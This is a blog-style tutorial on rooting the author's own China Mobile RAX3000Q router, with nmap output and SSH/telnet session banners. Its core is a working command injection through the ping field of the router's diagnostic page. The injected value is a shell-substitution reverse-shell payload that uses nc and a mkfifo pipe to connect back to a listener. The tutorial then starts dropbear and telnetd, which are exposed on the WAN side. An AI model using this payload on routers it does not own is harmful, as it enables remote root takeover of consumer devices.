(Old) Getting a shell on the China Mobile RAX3000Q router

Preface

After following imlk's article, the router at home could not fully reproduce the steps in it, even though the firmware version is the same:

Some characteristics:

  • No superadmin or senior user accounts
  • The open ports differ between the LAN and WAN addresses (only 80 on the LAN side; no restriction on the WAN side)
  • No LuCI
C:\Users\Administrator>nmap 192.168.10.1
Starting Nmap 7.91 ( https://nmap.org ) at 2022-12-18 12:00 China Standard Time
Nmap scan report for 192.168.10.1
Host is up (0.0051s latency).
Not shown: 999 filtered ports
PORT   STATE SERVICE
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 5.69 seconds

C:\Users\Administrator>nmap -6 2409:xxxx:xxxx:xxxx:xxxx:xxxx:xxxx:xxxx
Starting Nmap 7.91 ( https://nmap.org ) at 2022-12-18 12:00 China Standard Time
Nmap scan report for 2409:xxxx:xxxx:xxxx:xxxx:xxxx:xxxx:xxxx
Host is up (0.0036s latency).
Not shown: 996 closed ports
PORT     STATE SERVICE
53/tcp   open  domain
80/tcp   open  http
2601/tcp open  zebra
MAC Address: XX:XX:XX:XX:XX:XX (Unknown)

Nmap done: 1 IP address (1 host up) scanned in 13.33 seconds

Since I am broke and China Mobile will not give me a public IPv4 address, the router's IPv6 address is used as the public IP for the demonstration below.

Exploitation

Tools needed:

  • BurpSuite
  • nc

Getting the router's IPv6 address

  1. Log in to the gateway with the account and password printed on the back of the router
  2. Internet Settings -> More Settings -> Status (上网设置 -> 更多设置 -> 状态)
  3. Copy the IPv6 address for later use

nc

Start the listener: nc -lvnp 4444

Open Burp and set up the proxy:

Intercept the ping request from the router's diagnostic page. Generate a reverse shell at https://www.revshells.com/ ; the one I used is $(rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 192.168.1.98 4444 >/tmp/f), where 192.168.1.98 is the LAN address of the PC running nc (replace it with your own). The $( ... ) wrapper is shell command substitution: the ping target is spliced into a shell command line on the router, so whatever is inside the parentheses is executed there. Put the reverse shell command into the URL (the ping target) of the intercepted request and click send; the shell connects back to our PC.

ssh

From the nc shell, start dropbear:

/usr/sbin/dropbear -p 22

Connect over SSH using the IPv6 address obtained earlier. Note that the WAN side is unfiltered (see the nmap scan above), so dropbear started this way is reachable from the whole IPv6 internet with the root password; if you only need local access, bind it to the LAN address instead (dropbear -p 192.168.10.1:22) or stop it when you are done.

C:\Users\Administrator>ssh -6 root@2409:xxxx:xxxx:xxxx:xxxx:xxxx:xxxx:xxxx
root@2409:xxxx:xxxx:xxxx:xxxx:xxxx:xxxx:xxxx's password:


BusyBox v1.30.1 () built-in shell (ash)


         CCCCCCCCCCCCC MMMMMMMM               MMMMMMMM DDDDDDDDDDDDD                 CCCCCCCCCCCCC
      CCC::::::::::::C M:::::::M             M:::::::M D::::::::::::DDD           CCC::::::::::::C
    CC:::::::::::::::C M::::::::M           M::::::::M D:::::::::::::::DD       CC:::::::::::::::C
   C:::::CCCCCCCC::::C M:::::::::M         M:::::::::M DDD:::::DDDDD:::::D     C:::::CCCCCCCC::::C
  C:::::C       CCCCCC M::::::::::M       M::::::::::M   D:::::D    D:::::D   C:::::C       CCCCCC
 C:::::C               M:::::::::::M     M:::::::::::M   D:::::D     D:::::D C:::::C
 C:::::C               M:::::::M::::M   M::::M:::::::M   D:::::D     D:::::D C:::::C
 C:::::C               M::::::M M::::M M::::M M::::::M   D:::::D     D:::::D C:::::C
 C:::::C               M::::::M  M::::M::::M  M::::::M   D:::::D     D:::::D C:::::C
 C:::::C               M::::::M   M:::::::M   M::::::M   D:::::D     D:::::D C:::::C
 C:::::C               M::::::M    M:::::M    M::::::M   D:::::D     D:::::D C:::::C
  C:::::C       CCCCCC M::::::M     MMMMM     M::::::M   D:::::D    D:::::D   C:::::C       CCCCCC
   C:::::CCCCCCCC::::C M::::::M               M::::::M DDD:::::DDDDD:::::D     C:::::CCCCCCCC::::C
    CC:::::::::::::::C M::::::M               M::::::M D:::::::::::::::DD       CC:::::::::::::::C
      CCC::::::::::::C M::::::M               M::::::M D::::::::::::DDD           CCC::::::::::::C
         CCCCCCCCCCCCC MMMMMMMM               MMMMMMMM DDDDDDDDDDDDD                 CCCCCCCCCCCCC

 ---------------------------------------------------------------
   For those about to rock... (Chaos Calmer, 0e8bb6b37+r49254)
 ---------------------------------------------------------------
root@OpenWrt:~#

telnet

Once you have the nc shell, run telnetd to start the telnet service; again, connect using the IPv6 address. It is plaintext and, like dropbear, reachable from the WAN side as well, so treat it as a temporary door.

Connect: telnet 2409:xxxx:xxxx:xxxx:xxxx:xxxx:xxxx:xxxx 23

OpenWrt login: root
Password:

[BusyBox v1.30.1 (ash) banner, identical to the SSH session above]
root@OpenWrt:~#
Updated: 2024-01-28